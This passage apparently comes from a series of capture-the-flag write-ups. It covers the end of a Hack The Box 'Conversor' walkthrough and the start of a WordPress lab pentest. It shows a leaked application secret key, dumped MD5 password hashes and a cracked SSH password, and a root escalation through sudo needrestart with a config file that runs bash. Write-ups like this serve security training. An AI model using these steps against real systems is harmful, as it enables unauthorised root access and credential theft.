Well, one of easy way are to LinPEAS your way mapping, but lte’s do some manual for the sake of Write-ups:

www-data@conversor:/home$ cd /var
www-data@conversor:/var$ ls
backups  cache  crash  lib  local  lock  log  mail  opt  run  spool  tmp  www
www-data@conversor:/var$ cd backups
www-data@conversor:/var/backups$ ls
alternatives.tar.0        apt.extended_states.3.gz  dpkg.statoverride.0
apt.extended_states.0     apt.extended_states.4.gz  dpkg.status.0
apt.extended_states.1.gz  dpkg.arch.0               hygiene
apt.extended_states.2.gz  dpkg.diversions.0
www-data@conversor:/var/backups$ cd ..
www-data@conversor:/var$ cd mail
www-data@conversor:/var/mail$ ls
www-data@conversor:/var/mail$ cd ..
www-data@conversor:/var$ cd www
www-data@conversor:~$ ls
conversor.htb
www-data@conversor:~$ cd conversor.htb
www-data@conversor:~/conversor.htb$ ls
app.py  app.wsgi  instance  __pycache__  scripts  static  templates  uploads
www-data@conversor:~/conversor.htb$ cd uploads
www-data@conversor:~/conversor.htb/uploads$ ls
00cfcc4d-0a8e-43ad-b612-e3662f0f3577.html  exploit.xml
1ca48bd5-7016-4545-83b1-69e048f38dc7.html  exploit.xslt
70927e1b-bc1f-408b-bf6c-206cd2a257b2.html  test.xml
90ec9e53-4de0-43a8-bb2c-4625ce2ab1e1.html  test.xslt
ea464f2a-119e-4ce1-b839-028c9d466d34.html
www-data@conversor:~/conversor.htb/uploads$ cd ..
www-data@conversor:~/conversor.htb$ cd static
www-data@conversor:~/conversor.htb/static$ ls
images  nmap.xslt  source_code.tar.gz  style.css
www-data@conversor:~/conversor.htb/static$ cd ..
www-data@conversor:~/conversor.htb$ cat app.py 
from flask import Flask, render_template, request, redirect, url_for, session, send_from_directory
import os, sqlite3, hashlib, uuid

app = Flask(__name__)
app.secret_key = ‘C0nv3rs0rIsthek3y29’

BASE_DIR = os.path.dirname(os.path.abspath(__file__))
DB_PATH = ‘/var/www/conversor.htb/instance/users.db’
UPLOAD_FOLDER = os.path.join(BASE_DIR, ‘uploads’)
os.makedirs(UPLOAD_FOLDER, exist_ok=True)

def init_db():
    os.makedirs(os.path.join(BASE_DIR, ‘instance’), exist_ok=True)
    conn = sqlite3.connect(DB_PATH)
    c = conn.cursor()
    c.execute(’‘’CREATE TABLE IF NOT EXISTS users (
        id INTEGER PRIMARY KEY AUTOINCREMENT,
        username TEXT UNIQUE,
        password TEXT
    )’‘’)
    c.execute(’‘’CREATE TABLE IF NOT EXISTS files (
        id TEXT PRIMARY KEY,
        user_id INTEGER,
        filename TEXT,
        FOREIGN KEY(user_id) REFERENCES users(id)
    )’‘’)
    conn.commit()
    conn.close()

init_db()

def get_db():
    conn = sqlite3.connect(DB_PATH)
    conn.row_factory = sqlite3.Row
    return conn

@app.route(’/’)
def index():
    if ‘user_id’ not in session:
        return redirect(url_for(’login’))
    conn = get_db()
    cur = conn.cursor()
    cur.execute(”SELECT * FROM files WHERE user_id=?”, (session[’user_id’],))
    files = cur.fetchall()
    conn.close()
    return render_template(’index.html’, files=files)

@app.route(’/register’, methods=[’GET’,’POST’])
def register():
    if request.method == ‘POST’:
        username = request.form[’username’]
        password = hashlib.md5(request.form[’password’].encode()).hexdigest()
        conn = get_db()
        try:
            conn.execute(”INSERT INTO users (username,password) VALUES (?,?)”, (username,password))
            conn.commit()
            conn.close()
            return redirect(url_for(’login’))
        except sqlite3.IntegrityError:
            conn.close()
            return “Username already exists”
    return render_template(’register.html’)
@app.route(’/logout’)
def logout():
    session.clear()
    return redirect(url_for(’login’))


@app.route(’/about’)
def about():
 return render_template(’about.html’)

@app.route(’/login’, methods=[’GET’,’POST’])
def login():
    if request.method == ‘POST’:
        username = request.form[’username’]
        password = hashlib.md5(request.form[’password’].encode()).hexdigest()
        conn = get_db()
        cur = conn.cursor()
        cur.execute(”SELECT * FROM users WHERE username=? AND password=?”, (username,password))
        user = cur.fetchone()
        conn.close()
        if user:
            session[’user_id’] = user[’id’]
            session[’username’] = username
            return redirect(url_for(’index’))
        else:
            return “Invalid credentials”
    return render_template(’login.html’)


@app.route(’/convert’, methods=[’POST’])
def convert():
    if ‘user_id’ not in session:
        return redirect(url_for(’login’))
    xml_file = request.files[’xml_file’]
    xslt_file = request.files[’xslt_file’]
    from lxml import etree
    xml_path = os.path.join(UPLOAD_FOLDER, xml_file.filename)
    xslt_path = os.path.join(UPLOAD_FOLDER, xslt_file.filename)
    xml_file.save(xml_path)
    xslt_file.save(xslt_path)
    try:
        parser = etree.XMLParser(resolve_entities=False, no_network=True, dtd_validation=False, load_dtd=False)
        xml_tree = etree.parse(xml_path, parser)
        xslt_tree = etree.parse(xslt_path)
        transform = etree.XSLT(xslt_tree)
        result_tree = transform(xml_tree)
        result_html = str(result_tree)
        file_id = str(uuid.uuid4())
        filename = f”{file_id}.html”
        html_path = os.path.join(UPLOAD_FOLDER, filename)
        with open(html_path, “w”) as f:
            f.write(result_html)
        conn = get_db()
        conn.execute(”INSERT INTO files (id,user_id,filename) VALUES (?,?,?)”, (file_id, session[’user_id’], filename))
        conn.commit()
        conn.close()
        return redirect(url_for(’index’))
    except Exception as e:
        return f”Error: {e}”

@app.route(’/view/’)
def view_file(file_id):
    if ‘user_id’ not in session:
        return redirect(url_for(’login’))
    conn = get_db()
    cur = conn.cursor()
    cur.execute(”SELECT * FROM files WHERE id=? AND user_id=?”, (file_id, session[’user_id’]))
    file = cur.fetchone()
    conn.close()
    if file:
        return send_from_directory(UPLOAD_FOLDER, file[’filename’])
    return “File not found”
www-data@conversor:~/conversor.htb$

As you can see, there’s a Cronn and Database mechanism, should’ve some credentials inside.

So that’s could be our Potential for PrivEsc to User:

www-data@conversor:~/conversor.htb$ ls
app.py  app.wsgi  instance  __pycache__  scripts  static  templates  uploads
www-data@conversor:~/conversor.htb$ cd uploads
www-data@conversor:~/conversor.htb/uploads$ ls
00cfcc4d-0a8e-43ad-b612-e3662f0f3577.html  exploit.xml
1ca48bd5-7016-4545-83b1-69e048f38dc7.html  exploit.xslt
70927e1b-bc1f-408b-bf6c-206cd2a257b2.html  test.xml
90ec9e53-4de0-43a8-bb2c-4625ce2ab1e1.html  test.xslt
ea464f2a-119e-4ce1-b839-028c9d466d34.html
www-data@conversor:~/conversor.htb/uploads$ cd ..
www-data@conversor:~/conversor.htb$ cd instance
www-data@conversor:~/conversor.htb/instance$ ls
users.db
www-data@conversor:~/conversor.htb/instance$

Found em:

users.db

www-data@conversor:~/conversor.htb/instance$ sqlite3 -h
sqlite3: Error: unknown option: -h
Use -help for a list of options.
www-data@conversor:~/conversor.htb/instance$ sqlite -h
Command ‘sqlite’ not found, but can be installed with:
apt install sqlite
Please ask your administrator.
www-data@conversor:~/conversor.htb/instance$ apt install sqlite
E: Could not open lock file /var/lib/dpkg/lock-frontend - open (13: Permission denied)
E: Unable to acquire the dpkg frontend lock (/var/lib/dpkg/lock-frontend), are you root?
www-data@conversor:~/conversor.htb/instance$

Can’t do it from here, but we can Transfer it back to our attacker machine since this box have Python server.

SQL Database Enumeration

Let’s get it:

┌──(kali㉿kali)-[~]
└─$ sudo wget http://10.10.11.92:8000/users.db
--2025-10-26 03:52:55--  http://10.10.11.92:8000/users.db
Connecting to 10.10.11.92:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24576 (24K) [application/octet-stream]
Saving to: ‘users.db’

users.db                                                   100%[========================================================================================================================================>]  24.00K  93.5KB/s    in 0.3s    

2025-10-26 03:52:55 (93.5 KB/s) - ‘users.db’ saved [24576/24576]

                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$ ls -al
total 60
drwxr-xr-x   6 root root  4096 Oct 26 03:52 .
drwxr-xr-x 118 root root  4096 Oct 26 02:58 ..
drwxr-xr-x   2 root root  4096 Oct 26 02:58 db
-rw-r--r--   1 root root    46 Oct 26 03:06 exploit.xml
-rw-r--r--   1 root root   643 Oct 26 03:06 exploit.xslt
drwxr-xr-x   2 root root  4096 Oct 26 03:00 nmap
-rw-r--r--   1 root root   216 Oct 26 03:26 test.xslt
drwxr-xr-x   2 root root  4096 Oct 26 02:58 upload
-rw-r--r--   1 root root 24576 Oct 26 03:47 users.db
drwxr-xr-x   2 root root  4096 Oct 26 02:58 www
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$

┌──(kali㉿kali)-[~]
└─$ sudo sqlite3 users.db 
SQLite version 3.46.1 2024-08-13 09:16:08
Enter “.help” for usage hints.
sqlite>

That took too much time to run, let’s just fire up:

for t in $(sqlite3 users.db "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name;"); do echo "== $t =="; sqlite3 -header -column users.db "SELECT * FROM '$t' LIMIT 20;"; echo; done

Result:

┌──(kali㉿kali)-[~]
└─$ for t in $(sqlite3 users.db "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name;"); do echo "== $t =="; sqlite3 -header -column users.db "SELECT * FROM '$t' LIMIT 20;"; echo; done
== files ==
id                                    user_id  filename                                 
------------------------------------  -------  -----------------------------------------
8374be69-0931-4445-8f58-5589d27ec7d7  2        8374be69-0931-4445-8f58-5589d27ec7d7.html
a10bcb29-b9c0-4b3d-99aa-c4f0e8afd4e2  2        a10bcb29-b9c0-4b3d-99aa-c4f0e8afd4e2.html
89af2dd2-48b2-41b5-a2ba-e2c7a20b2a8b  2        89af2dd2-48b2-41b5-a2ba-e2c7a20b2a8b.html
00508ffa-82dd-4c42-9867-7dd4a6b16605  2        00508ffa-82dd-4c42-9867-7dd4a6b16605.html
0facc6c2-7625-4240-9dd0-d1085335224c  3        0facc6c2-7625-4240-9dd0-d1085335224c.html
f06dc183-e13f-4f4c-8389-7e414d7fe573  3        f06dc183-e13f-4f4c-8389-7e414d7fe573.html
c3f1ec9b-1b2c-49d2-96a6-33aff7028391  3        c3f1ec9b-1b2c-49d2-96a6-33aff7028391.html
1363be8b-c6c8-4227-92cc-1367b434fb14  4        1363be8b-c6c8-4227-92cc-1367b434fb14.html
1ca48bd5-7016-4545-83b1-69e048f38dc7  6        1ca48bd5-7016-4545-83b1-69e048f38dc7.html
70927e1b-bc1f-408b-bf6c-206cd2a257b2  6        70927e1b-bc1f-408b-bf6c-206cd2a257b2.html
00cfcc4d-0a8e-43ad-b612-e3662f0f3577  6        00cfcc4d-0a8e-43ad-b612-e3662f0f3577.html
90ec9e53-4de0-43a8-bb2c-4625ce2ab1e1  6        90ec9e53-4de0-43a8-bb2c-4625ce2ab1e1.html
ea464f2a-119e-4ce1-b839-028c9d466d34  6        ea464f2a-119e-4ce1-b839-028c9d466d34.html

== sqlite_sequence ==
name   seq
-----  ---
users  7  

== users ==
id  username    password                        
--  ----------  --------------------------------
1   fismathack  5b5c3ac3a1c897c94caad48e6c71fdec
5   kali        173504eca0567d0343148269ae797fa7
6   anakayam    729836b5042724dc00a048f49bc23721
7   salom       fb8c7016c412609e9fca4e65bb5e41f4

5b5c3ac3a1c897c94caad48e6c71fdec
173504eca0567d0343148269ae797fa7
729836b5042724dc00a048f49bc23721
fb8c7016c412609e9fca4e65bb5e41f4

Great, and I believe we gain User fismathack also:

┌──(kali㉿kali)-[~]
└─$ hashid hash.txt 
--File ‘hash.txt’--
Analyzing ‘5b5c3ac3a1c897c94caad48e6c71fdec’
[+] MD2 
[+] MD5 
[+] MD4 
[+] Double MD5 
[+] LM 
[+] RIPEMD-128 
[+] Haval-128 
[+] Tiger-128 
[+] Skein-256(128) 
[+] Skein-512(128) 
[+] Lotus Notes/Domino 5 
[+] Skype 
[+] Snefru-128 
[+] NTLM 
[+] Domain Cached Credentials 
[+] Domain Cached Credentials 2 
[+] DNSSEC(NSEC3) 
[+] RAdmin v2.x 
Analyzing ‘173504eca0567d0343148269ae797fa7’
[+] MD2 
[+] MD5 
[+] MD4 
[+] Double MD5 
[+] LM 
[+] RIPEMD-128 
[+] Haval-128 
[+] Tiger-128 
[+] Skein-256(128) 
[+] Skein-512(128) 
[+] Lotus Notes/Domino 5 
[+] Skype 
[+] Snefru-128 
[+] NTLM 
[+] Domain Cached Credentials 
[+] Domain Cached Credentials 2 
[+] DNSSEC(NSEC3) 
[+] RAdmin v2.x 
Analyzing ‘729836b5042724dc00a048f49bc23721’
[+] MD2 
[+] MD5 
[+] MD4 
[+] Double MD5 
[+] LM 
[+] RIPEMD-128 
[+] Haval-128 
[+] Tiger-128 
[+] Skein-256(128) 
[+] Skein-512(128) 
[+] Lotus Notes/Domino 5 
[+] Skype 
[+] Snefru-128 
[+] NTLM 
[+] Domain Cached Credentials 
[+] Domain Cached Credentials 2 
[+] DNSSEC(NSEC3) 
[+] RAdmin v2.x 
Analyzing ‘fb8c7016c412609e9fca4e65bb5e41f4’
[+] MD2 
[+] MD5 
[+] MD4 
[+] Double MD5 
[+] LM 
[+] RIPEMD-128 
[+] Haval-128 
[+] Tiger-128 
[+] Skein-256(128) 
[+] Skein-512(128) 
[+] Lotus Notes/Domino 5 
[+] Skype 
[+] Snefru-128 
[+] NTLM 
[+] Domain Cached Credentials 
[+] Domain Cached Credentials 2 
[+] DNSSEC(NSEC3) 
[+] RAdmin v2.x 
--End of file ‘hash.txt’--

Credential:

User: fismathack
Passwd: Keepmesafeandwarm

PrivEsc to System root

┌──(kali㉿kali)-[~]
└─$ netexec ssh conversor.htb -u fismathack -p Keepmesafeandwarm 
SSH         10.10.11.92     22     conversor.htb    [*] SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13
SSH         10.10.11.92     22     conversor.htb    [+] fismathack:Keepmesafeandwarm  Linux - Shell access!

So it’s correct and we can get a Shell from it:

┌──(kali㉿kali)-[~]
└─$ sudo ssh fismathack@conversor.htb
fismathack@conversor.htb’s password: 
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-160-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of 

  System load:  0.0               Processes:             220
  Usage of /:   64.9% of 5.78GB   Users logged in:       0
  Memory usage: 8%                IPv4 address for eth0: 10.10.11.92
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: 
fismathack@conversor:~$

Enumeration again as User:

fismathack@conversor:~$ id
uid=1000(fismathack) gid=1000(fismathack) groups=1000(fismathack)
fismathack@conversor:~$ groups
fismathack
fismathack@conversor:~$ sudo -i
[sudo] password for fismathack: 
Sorry, user fismathack is not allowed to execute ‘/bin/bash’ as root on conversor.
fismathack@conversor:~$ sudo su
[sudo] password for fismathack: 
Sorry, user fismathack is not allowed to execute ‘/usr/bin/su’ as root on conversor.
fismathack@conversor:~$ sudo -l
Matching Defaults entries for fismathack on conversor:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User fismathack may run the following commands on conversor:
    (ALL : ALL) NOPASSWD: /usr/sbin/needrestart
fismathack@conversor:~$

And we hit a Jack-pot.

fismathack@conversor:~$ needrestart -h
Unknown option: h
Usage:

  needrestart [-vn] [-c ] [-r ] [-f ] [-u ] [-(b|p|o)] [-klw]

    -v          be more verbose
    -q          be quiet
    -m    set detail level
        e       (e)asy mode
        a       (a)dvanced mode
    -n          set default answer to ‘no’
    -c     config filename
    -r    set restart mode
        l       (l)ist only
        i       (i)nteractive restart
        a       (a)utomatically restart
    -b          enable batch mode
    -p          enable nagios plugin mode
    -o          enable OpenMetrics output mode, implies batch mode, cannot be used simultaneously with -p
    -f      override debconf frontend (DEBIAN_FRONTEND, debconf(7))
    -t  tolerate interpreter process start times within this value
    -u      use preferred UI package (-u ? shows available packages)

  By using the following options only the specified checks are performed:
    -k          check for obsolete kernel
    -l          check for obsolete libraries
    -w          check for obsolete CPU microcode

    --help      show this help
    --version   show version information

fismathack@conversor:~$

I think we can just implant bash script into it, then get UID root access after.

Yeah, I think we can do that,

fismathack@conversor:~$ cd /tmp
fismathack@conversor:/tmp$ ls
systemd-private-eaeead5c72d84b99b5f3889af7689733-apache2.service-sG95uZ         systemd-private-eaeead5c72d84b99b5f3889af7689733-systemd-resolved.service-KEijRT
systemd-private-eaeead5c72d84b99b5f3889af7689733-ModemManager.service-TlseTS    systemd-private-eaeead5c72d84b99b5f3889af7689733-systemd-timesyncd.service-Bq6aKY
systemd-private-eaeead5c72d84b99b5f3889af7689733-systemd-logind.service-lHSkFV  vmware-root_793-4248746047
fismathack@conversor:/tmp$

So this are our payloads:

echo ‘system(”/bin/bash”);’ > /tmp/root.sh
sudo /usr/sbin/needrestart -c /tmp/root.sh

fismathack@conversor:/tmp$ echo ‘system(”/bin/bash”);’ > /tmp/root.sh
fismathack@conversor:/tmp$ ls
root.sh                                                                       systemd-private-eaeead5c72d84b99b5f3889af7689733-systemd-logind.service-lHSkFV     vmware-root_793-4248746047
systemd-private-eaeead5c72d84b99b5f3889af7689733-apache2.service-sG95uZ       systemd-private-eaeead5c72d84b99b5f3889af7689733-systemd-resolved.service-KEijRT
systemd-private-eaeead5c72d84b99b5f3889af7689733-ModemManager.service-TlseTS  systemd-private-eaeead5c72d84b99b5f3889af7689733-systemd-timesyncd.service-Bq6aKY
fismathack@conversor:/tmp$ sudo /usr/sbin/needrestart -c /tmp/root.sh
root@conversor:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@conversor:/tmp# whoami
root
root@conversor:/tmp#

Welp, that is it. We’re now a root access,

root@conversor:/tmp# whoami
root
root@conversor:/tmp# cd /root
root@conversor:~# ls
root.txt  scripts
root@conversor:~# cd scripts
root@conversor:~/scripts# ls
clean_sudo.sh  clean_web.py  sudoers
root@conversor:~/scripts# cd ..
root@conversor:~# ls -al
total 44
drwx------  6 root root 4096 Oct 26 02:09 .
drwxr-xr-x 19 root root 4096 Oct 21 05:45 ..
lrwxrwxrwx  1 root root    9 Oct 21 05:45 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Oct 15  2021 .bashrc
drwxr-xr-x  2 root root 4096 Aug 15 05:06 .cache
drwxr-xr-x  3 root root 4096 Sep 23 14:00 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
lrwxrwxrwx  1 root root    9 Aug 15 04:40 .python_history -> /dev/null
-rw-r-----  1 root root   33 Oct 26 02:09 root.txt
drwxr-xr-x  2 root root 4096 Oct 16 10:25 scripts
-rw-r--r--  1 root root   66 Jul 31 05:36 .selected_editor
lrwxrwxrwx  1 root root    9 Jul 31 22:04 .sqlite_history -> /dev/null
drwx------  2 root root 4096 Aug 15 05:06 .ssh
-rw-r--r--  1 root root  165 Oct 21 05:45 .wget-hsts
root@conversor:~# cd .ssh
root@conversor:~/.ssh# ls
root@conversor:~/.ssh#

labs.hackthebox.com/achievement/machine/1929663/787

Absolute banger!

Until next time and Happy Hacking, together we make the Internet more bleeding!

Infra Assessor from WebApp to Local Machine: Part 24

Sulaiman — Wed, 04 Mar 2026 07:26:49 GMT

Offensive Security

On this another internal Pentesting practices, all we got is an IP Address:

192.168.179.89

Start with:

Network Enumeration and Port Discovery

┌──(kali㉿kali)-[~]
└─$ ping -c2 192.168.179.89
PING 192.168.179.89 (192.168.179.89) 56(84) bytes of data.
64 bytes from 192.168.179.89: icmp_seq=1 ttl=61 time=20.5 ms
64 bytes from 192.168.179.89: icmp_seq=2 ttl=61 time=21.0 ms

--- 192.168.179.89 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 20.478/20.763/21.049/0.285 ms

Continue with NMAP Scanning

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -p- --min-rate 8000 192.168.179.89 -oA nmap/nmapscan
Starting Nmap 7.95 ( https://nmap.org ) at 
Nmap scan report for 192.168.179.89
Host is up (0.023s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
33060/tcp open  mysqlx

Nmap done: 1 IP address (1 host up) scanned in seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -p22,80,33060 -sC -sV 192.168.179.89 -oA nmap/nmapscan-ports
Starting Nmap 7.95 ( https://nmap.org ) at
Nmap scan report for 192.168.179.89
Host is up (0.026s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 91:ba:0d:d4:39:05:e3:13:55:57:8f:1b:46:90:db:e4 (RSA)
|   256 0f:35:d1:a1:31:f2:f6:aa:75:e8:17:01:e7:1e:d1:d5 (ECDSA)
|_  256 af:f1:53:ea:7b:4d:d7:fa:d8:de:0d:f2:28:fc:86:d7 (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/secret.txt
|_http-generator: WordPress 5.4.2
|_http-title: OSCP Voucher – Just another WordPress site
33060/tcp open  mysqlx  MySQL X protocol listener
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in seconds

Okay, we can see it’s a WordPress based Web service.

HTTP Web Enumeration

This is the interface:

Realize this is WordPress and so much interaction, I decide to just scroll lil bit then continue with Ferox-buster:

Ferox:

┌──(kali㉿kali)-[~]
└─$ sudo feroxbuster -u http://192.168.179.89/ --filter-status 404
                                                                                                                                                                                                                                             
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.179.89/
 🚩  In-Scope Url          │ 192.168.179.89
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 💢  Status Code Filters   │ [404]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET       46l       46w     3502c http://192.168.179.89/secret.txt
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      322c http://192.168.179.89/wp-includes => http://192.168.179.89/wp-includes/
200      GET       43l       43w     1045c http://192.168.179.89/wp-includes/wlwmanifest.xml
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-widget.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/ms-default-filters.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/update.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/ID3/getid3.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/ID3/module.audio-video.asf.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/ID3/module.tag.lyrics3.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/ID3/module.tag.id3v1.php
200      GET       29l       93w     1361c http://192.168.179.89/wp-includes/ID3/license.txt
405      GET        1l        6w       42c http://192.168.179.89/xmlrpc.php
200      GET       11l      856w    53593c http://192.168.179.89/wp-includes/css/dist/block-library/style.min.css
200      GET       86l      290w     4829c http://192.168.179.89/wp-login.php
301      GET        9l       28w      321c http://192.168.179.89/javascript => http://192.168.179.89/javascript/
301      GET        9l       28w      321c http://192.168.179.89/wp-content => http://192.168.179.89/wp-content/
200      GET      452l     1981w    32895c http://192.168.179.89/
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-http.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/embed-template.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-site-query.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/default-widgets.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-locale-switcher.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/canonical.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-matchesmapregex.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/category-template.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-session-tokens.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/plugin.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/ms-deprecated.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-http-streams.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-role.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-walker-comment.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-hook.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-rewrite.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/atomlib.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/feed-atom-comments.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/ms-default-constants.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/bookmark.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-user-query.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/feed-rdf.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/feed-rss2.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-user-meta-session-tokens.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-comment.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-feed.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-http-ixr-client.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-json.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-error.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class.wp-scripts.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/query.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-fatal-error-handler.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/shortcodes.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-customize-panel.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-image-editor.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-feed-cache.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/taxonomy.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/feed.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/feed-rss2-comments.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-requests.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-term.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-recovery-mode-cookie-service.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-simplepie-file.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-customize-setting.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/compat.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-oembed.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/widgets/class-wp-widget-recent-comments.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/pluggable.php
404      GET      294l     1151w    21109c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-http-requests-hooks.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-customize-manager.php
301      GET        9l       28w      328c http://192.168.179.89/wp-content/themes => http://192.168.179.89/wp-content/themes/
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-recovery-mode-link-service.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-IXR.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-recovery-mode-email-service.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-smtp.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/Text/Diff.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/IXR/class-IXR-value.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/IXR/class-IXR-date.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/IXR/class-IXR-clientmulticall.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/IXR/class-IXR-message.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/IXR/class-IXR-request.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/spl-autoload-compat.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/user.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/wp-db.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/ms-functions.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/template-loader.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/feed-atom.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-walker-page-dropdown.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-walker-category.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-user.php
